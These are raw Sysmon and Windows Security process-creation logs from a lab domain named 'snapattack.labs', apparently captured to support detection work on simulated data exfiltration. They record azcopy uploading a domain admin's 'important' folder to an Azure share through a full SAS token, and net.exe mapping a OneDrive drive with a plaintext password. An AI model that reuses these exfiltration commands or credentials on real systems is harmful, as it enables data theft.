1 5 4 1 0 0x8000000000000000 11817 Microsoft-Windows-Sysmon/Operational DC01.snapattack.labs - 2024-11-19 18:22:43.176 A5CDDB11-D773-673C-0506-000000000900 4224 C:\Users\domainadmin\Downloads\azcopy.exe - - - - - azcopy.exe copy "C:\users\domainadmin\important" "https://rtaitstorage.file.core.windows.net/test/?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupiytfx&se=2024-11-20T02:08:45Z&st=2024-11-19T18:08:45Z&spr=https&sig=%%2FdWxzmcOCKqnHvrscm%%2F3r1uD3PYxPzzunmL6jFgPN%%2FI%%3D" --recursive C:\Users\domainadmin\Downloads\ snapattack\domainadmin A5CDDB11-CF26-673C-ADA5-070000000000 0x7a5ad 1 High MD5=6211C80B0227EE939306D66B5C118531,SHA256=7A00078830E4ED87048240982EE6CE8C213CC542F7F829EEC9273064695CCEB1,IMPHASH=B196866F0BF37F1F128FA153413B744F 00000000-0000-0000-0000-000000000000 6868 - - - 1 5 4 1 0 0x8000000000000000 11817 Microsoft-Windows-Sysmon/Operational DC01.snapattack.labs - 2024-11-19 18:22:43.176 A5CDDB11-D773-673C-0506-000000000900 4224 C:\Users\domainadmin\Downloads\azcopy.exe - - - - - azcopy.exe copy "C:\users\domainadmin\important" "https://rtaitstorage.file.core.windows.net/test/?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupiytfx&se=2024-11-20T02:08:45Z&st=2024-11-19T18:08:45Z&spr=https&sig=%%2FdWxzmcOCKqnHvrscm%%2F3r1uD3PYxPzzunmL6jFgPN%%2FI%%3D" --recursive C:\Users\domainadmin\Downloads\ snapattack\domainadmin A5CDDB11-CF26-673C-ADA5-070000000000 0x7a5ad 1 High MD5=6211C80B0227EE939306D66B5C118531,SHA256=7A00078830E4ED87048240982EE6CE8C213CC542F7F829EEC9273064695CCEB1,IMPHASH=B196866F0BF37F1F128FA153413B744F 00000000-0000-0000-0000-000000000000 6868 - - - 4688 2 0 13312 0 0x8020000000000000 501669 Security MSEDGEWIN10.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-1103 snapattack SNAPATTACK 0x807ad 0x1288 C:\Windows\System32\net.exe %%1937 0x2370 "C:\Windows\system32\net.exe" use y: https://d.docs.live.net/e2cc75927a725030 /user:snap.throwaway@outlook.com Throwitaway1! S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288 4688 2 0 13312 0 0x8020000000000000 501669 Security MSEDGEWIN10.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-1103 snapattack SNAPATTACK 0x807ad 0x1288 C:\Windows\System32\net1.exe %%1937 0x2370 "C:\Windows\system32\net1.exe" use y: https://d.docs.live.net/e2cc75927a725030 /user:snap.throwaway@outlook.com Throwitaway1! S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288